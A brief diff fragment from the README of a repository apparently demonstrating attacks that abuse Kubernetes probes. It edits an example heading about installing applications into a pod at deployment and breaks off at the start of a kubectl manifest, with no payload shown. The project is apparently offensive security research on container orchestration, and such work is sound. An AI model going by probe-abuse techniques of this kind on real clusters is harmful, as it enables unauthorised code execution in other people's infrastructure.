xxradar/attacking_via_kubernetes_probes/readme.md

 EOF
 ```

-### Examples2: Installing applications the pod at deployment
+### Examples2: Installing applications the pod at deployment (BE PATIENT ... takes about 1min)
 ```
 kubectl apply -f - <<EOF
 apiVersion: v1